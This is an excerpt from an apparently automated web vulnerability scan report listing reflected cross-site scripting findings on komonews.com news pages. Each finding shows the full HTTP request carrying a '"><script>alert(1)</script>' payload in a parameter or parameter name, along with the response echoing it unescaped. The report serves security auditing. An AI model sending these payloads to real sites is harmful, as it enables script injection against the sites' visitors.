HTTP/1.1 200 OK Server: Apache X-Server-Name: dv-c1-r2-u7-b6 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:12:32 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 54939
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
It's a bir ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/local/116703604.html?tab=video&26e1a"><script>alert(1)</script>2036797cb5c=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
The value of the skipthumb request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17c21"><script>alert(1)</script>c8a8d55f906 was submitted in the skipthumb parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/local/116703604.html?skipthumb=Y17c21"><script>alert(1)</script>c8a8d55f906 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: dv-c1-r1-u24-b6 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:12:25 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 56542
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
It's a bir ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/local/116703604.html?skipthumb=Y17c21"><script>alert(1)</script>c8a8d55f906" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e25b"><script>alert(1)</script>88a93434d89 was submitted in the tab parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/local/116703604.html?tab=video2e25b"><script>alert(1)</script>88a93434d89 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: dv-c1-r1-u24-b6 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:12:22 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 56541
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
It's a bir ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/local/116703604.html?tab=video2e25b"><script>alert(1)</script>88a93434d89" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.443. http://www.komonews.com/news/local/116706579.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/local/116706579.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53cb9"><script>alert(1)</script>51a8b418a42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/local/116706579.html?53cb9"><script>alert(1)</script>51a8b418a42=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: dv-c1-r2-u24-b7 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:12:43 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 58421
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
'I think h ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/local/116706579.html?53cb9"><script>alert(1)</script>51a8b418a42=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.444. http://www.komonews.com/news/local/116707379.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/local/116707379.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4abb"><script>alert(1)</script>1481598e616 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/local/116707379.html?e4abb"><script>alert(1)</script>1481598e616=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: dv-c1-r2-u24-b14 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:12:30 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 61154
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
Tuba Man k ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/local/116707379.html?e4abb"><script>alert(1)</script>1481598e616=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.445. http://www.komonews.com/news/local/116712649.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/local/116712649.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93ccc"><script>alert(1)</script>185c63b8fe2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/local/116712649.html?93ccc"><script>alert(1)</script>185c63b8fe2=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: dv-c1-r2-u7-b6 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:12:43 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 53722
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
Wash. bill ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/local/116712649.html?93ccc"><script>alert(1)</script>185c63b8fe2=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.446. http://www.komonews.com/news/local/116714899.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/local/116714899.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7aad0"><script>alert(1)</script>aabf954c4e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/local/116714899.html?7aad0"><script>alert(1)</script>aabf954c4e2=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: dv-c1-r2-u7-b6 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:12:36 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 56376
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
1.447. http://www.komonews.com/news/local/116727124.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/local/116727124.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b481"><script>alert(1)</script>23228f2d5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/local/116727124.html?6b481"><script>alert(1)</script>23228f2d5e=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: dv-c1-r1-u24-b6 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:12:31 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 63488
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
Snow begin ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/local/116727124.html?6b481"><script>alert(1)</script>23228f2d5e=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.448. http://www.komonews.com/news/local/116745309.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/local/116745309.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14dfb"><script>alert(1)</script>64fe1ebf191 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/local/116745309.html?14dfb"><script>alert(1)</script>64fe1ebf191=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: dv-c1-r2-u24-b7 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:12:31 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 56554
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
No freedom ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/local/116745309.html?14dfb"><script>alert(1)</script>64fe1ebf191=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.449. http://www.komonews.com/news/local/116752479.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/local/116752479.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7da8"><script>alert(1)</script>0858a8ba4ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/local/116752479.html?c7da8"><script>alert(1)</script>0858a8ba4ab=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: dv-c1-r1-u24-b6 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:12:33 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 53652
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
1.450. http://www.komonews.com/news/local/116755469.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/local/116755469.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a016a"><script>alert(1)</script>eedbf6babab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/local/116755469.html?a016a"><script>alert(1)</script>eedbf6babab=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: dv-c1-r2-u24-b14 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:12:30 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 55643
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
1.451. http://www.komonews.com/news/national/115640079.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/national/115640079.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5920"><script>alert(1)</script>347bc1c610 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/national/115640079.html?b5920"><script>alert(1)</script>347bc1c610=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u38-b3 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:12:59 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 55978
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
Pregnant w ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/national/115640079.html?b5920"><script>alert(1)</script>347bc1c610=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.452. http://www.komonews.com/news/national/116404039.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/national/116404039.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49972"><script>alert(1)</script>1d3733e8d04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/national/116404039.html?49972"><script>alert(1)</script>1d3733e8d04=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u22-b5 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:12:54 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 60209
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
Man held o ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/national/116404039.html?49972"><script>alert(1)</script>1d3733e8d04=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.453. http://www.komonews.com/news/national/116502428.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/national/116502428.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a05a6"><script>alert(1)</script>ef92945c33c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/national/116502428.html?a05a6"><script>alert(1)</script>ef92945c33c=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u38-b3 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:12:53 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 57722
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
1.454. http://www.komonews.com/news/national/116713504.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/national/116713504.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ceb2"><script>alert(1)</script>089115a8881 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/national/116713504.html?5ceb2"><script>alert(1)</script>089115a8881=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u22-b5 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:12:56 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 57248
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
1.455. http://www.komonews.com/news/national/116734714.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/national/116734714.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd604"><script>alert(1)</script>91f36b20a5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/national/116734714.html?dd604"><script>alert(1)</script>91f36b20a5c=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u22-b5 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:12:49 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 58164
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
